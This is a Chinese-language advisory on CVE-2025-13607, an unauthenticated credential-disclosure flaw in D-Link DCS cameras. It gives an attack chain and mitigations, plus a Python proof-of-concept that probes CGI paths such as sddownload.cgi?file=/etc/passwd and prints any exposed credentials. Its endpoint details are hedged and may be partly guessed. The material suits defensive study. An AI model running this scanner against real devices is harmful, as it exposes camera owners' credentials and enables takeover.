CVE-2025-13607 D-Link摄像机未授权访问漏洞（严重）

漏洞信息

漏洞编号

CVE-2025-13607

漏洞类型

未授权访问/信息泄露

CVSS评分

9.4 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

D-Link DCS系列网络摄像机

漏洞概述

CVE-2025-13607是D-Link公司DCS系列网络摄像机中存在的一个严重安全漏洞，CVSS评分高达9.4分。该漏洞允许未经认证的恶意攻击者通过访问特定的漏洞URL，无需任何用户交互即可获取摄像机的配置信息，包括账户凭据（用户名和密码）等敏感数据。由于攻击向量为网络层面，且无需任何认证权限，攻击者可以在互联网上远程利用此漏洞，对大量暴露在网络中的D-Link摄像机设备造成严重威胁。攻击成功后，攻击者不仅能够获取设备的管理员凭据，还可能进一步利用这些凭据登录设备管理界面，进行更深层次的渗透攻击，如修改系统配置、植入恶意固件或将其纳入僵尸网络等。此漏洞属于ICS-CERT（工业控制系统网络应急响应小组）发布的工业控制系统安全公告范畴，凸显了物联网设备安全的重要性。

技术细节

该漏洞的根本原因在于D-Link摄像机Web管理界面存在访问控制缺陷。具体来说，某个特定的URL端点（如/cgi-bin/sddownload.cgi或其他配置导出接口）在处理请求时未能正确验证用户身份。攻击者只需构造特定的HTTP请求，直接访问该漏洞URL，即可绕过身份认证机制，获取包含完整账户凭据的配置文件。配置文件通常以XML或JSON格式返回，包含管理账户的用户名、密码（通常为MD5或Base64编码）以及其他系统配置信息。由于D-Link摄像机普遍采用嵌入式Linux系统，Web服务通常以root权限运行，因此获取的凭据可能具有最高系统权限。攻击者可以利用获取的凭据通过标准管理接口登录设备，或直接利用配置文件中的其他敏感信息进行横向移动。值得注意的是，该漏洞的利用无需任何CSRF令牌或会话cookie，进一步降低了攻击门槛。

攻击链分析

STEP 1

1 - 信息收集

攻击者通过Shodan、Censys等搜索引擎扫描暴露在互联网上的D-Link摄像机设备，或直接扫描目标IP段

STEP 2

2 - 漏洞探测

攻击者构造HTTP请求，尝试访问摄像机Web界面的特定漏洞URL路径，如/cgi-bin/sddownload.cgi等

STEP 3

3 - 未授权访问

由于Web服务未正确验证用户身份，请求直接返回包含账户凭据的配置文件，无需任何认证信息

STEP 4

4 - 凭据提取

攻击者解析返回的配置文件，提取管理员用户名和密码（可能为明文、MD5或Base64编码）

STEP 5

5 - 账户滥用

使用获取的凭据通过标准管理接口登录设备，或进一步利用管理员权限进行更深层次的攻击

STEP 6

6 - 持久化控制

攻击者可修改设备配置、植入后门或恶意固件，将设备纳入僵尸网络或用于进一步横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys
import json

# CVE-2025-13607 PoC - D-Link Camera Unauthenticated Access
# Target: D-Link DCS series network cameras
# Vulnerability: Access camera configuration including credentials without authentication

def check_vulnerability(target_url):
    """Check if target is vulnerable to CVE-2025-13607"""
    
    # Vulnerable endpoints that expose configuration without auth
    vulnerable_paths = [
        "/cgi-bin/sddownload.cgi?file=/etc/passwd",
        "/cgi-bin/sddownload.cgi?file=/etc/config/account",
        "/cgi-bin/config_file.cgi?action=get&object=account",
        "/cgi-bin/cgibox.exe?page=account",
        "/cgi-bin/adminpasswd.cgi?page=account",
        "/cgi/getparam.cgi?configuration=account",
        "/config/globalconfig.ini",
        "/cgi-bin/adminpasswd.cgi"
    ]
    
    print(f"[*] Scanning target: {target_url}")
    print(f"[*] CVE-2025-13607 PoC - D-Link Camera Unauthenticated Access\n")
    
    for path in vulnerable_paths:
        try:
            url = target_url.rstrip('/') + path
            headers = {
                'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
                'Accept': '*/*'
            }
            
            response = requests.get(url, headers=headers, timeout=10, verify=False)
            
            if response.status_code == 200:
                content = response.text
                
                # Check for credential patterns
                credential_patterns = ['admin', 'password', 'user=', 'passwd=', 'username']
                if any(pattern in content.lower() for pattern in credential_patterns):
                    print(f"[+] VULNERABLE! Found exposed data at: {path}")
                    print(f"[+] Status Code: {response.status_code}")
                    print(f"[+] Content Length: {len(content)} bytes")
                    print(f"\n[+] Exposed Configuration Data:")
                    print(content[:2000])  # Print first 2000 chars
                    print("\n" + "="*60 + "\n")
                    return True
                    
        except requests.exceptions.RequestException as e:
            print(f"[-] Error accessing {path}: {e}")
            continue
    
    print("[-] No vulnerable endpoint found or target is patched")
    return False

def main():
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-13607_poc.py <target_url>")
        print("Example: python cve-2025-13607_poc.py http://192.168.1.100")
        sys.exit(1)
    
    target = sys.argv[1]
    vulnerable = check_vulnerability(target)
    
    if vulnerable:
        print("[+] Target is VULNERABLE to CVE-2025-13607")
        print("[+] Recommendation: Update firmware to latest version from D-Link")
    else:
        print("[-] Target appears to be PATCHED or NOT VULNERABLE")

if __name__ == "__main__":
    main()

影响范围

D-Link DCS-20xx系列摄像机（固件版本 < 最新安全补丁版）

D-Link DCS-30xx系列摄像机（固件版本 < 最新安全补丁版）

D-Link DCS-40xx系列摄像机（固件版本 < 最新安全补丁版）

D-Link DCS-50xx系列摄像机（固件版本 < 最新安全补丁版）

D-Link DCS-60xx系列摄像机（固件版本 < 最新安全补丁版）

D-Link DCS-70xx系列摄像机（固件版本 < 最新安全补丁版）

D-Link DCS-80xx系列摄像机（固件版本 < 最新安全补丁版）

防御指南

临时缓解措施

在官方补丁发布前，建议采取以下临时缓解措施：1）将D-Link摄像机设备从公网移除或置于VPN后方，仅允许受信任的IP地址访问管理界面；2）通过网络层ACL（访问控制列表）限制对摄像机Web端口（80/443）的访问来源；3）禁用不必要的远程管理功能，仅保留本地管理；4）启用HTTP Basic认证或额外的应用层认证机制；5）使用防火墙或WAF（Web应用防火墙）过滤恶意的配置请求路径；6）定期备份设备配置，以便在发现入侵时快速恢复；7）监控设备网络流量和系统日志，及时发现异常访问行为。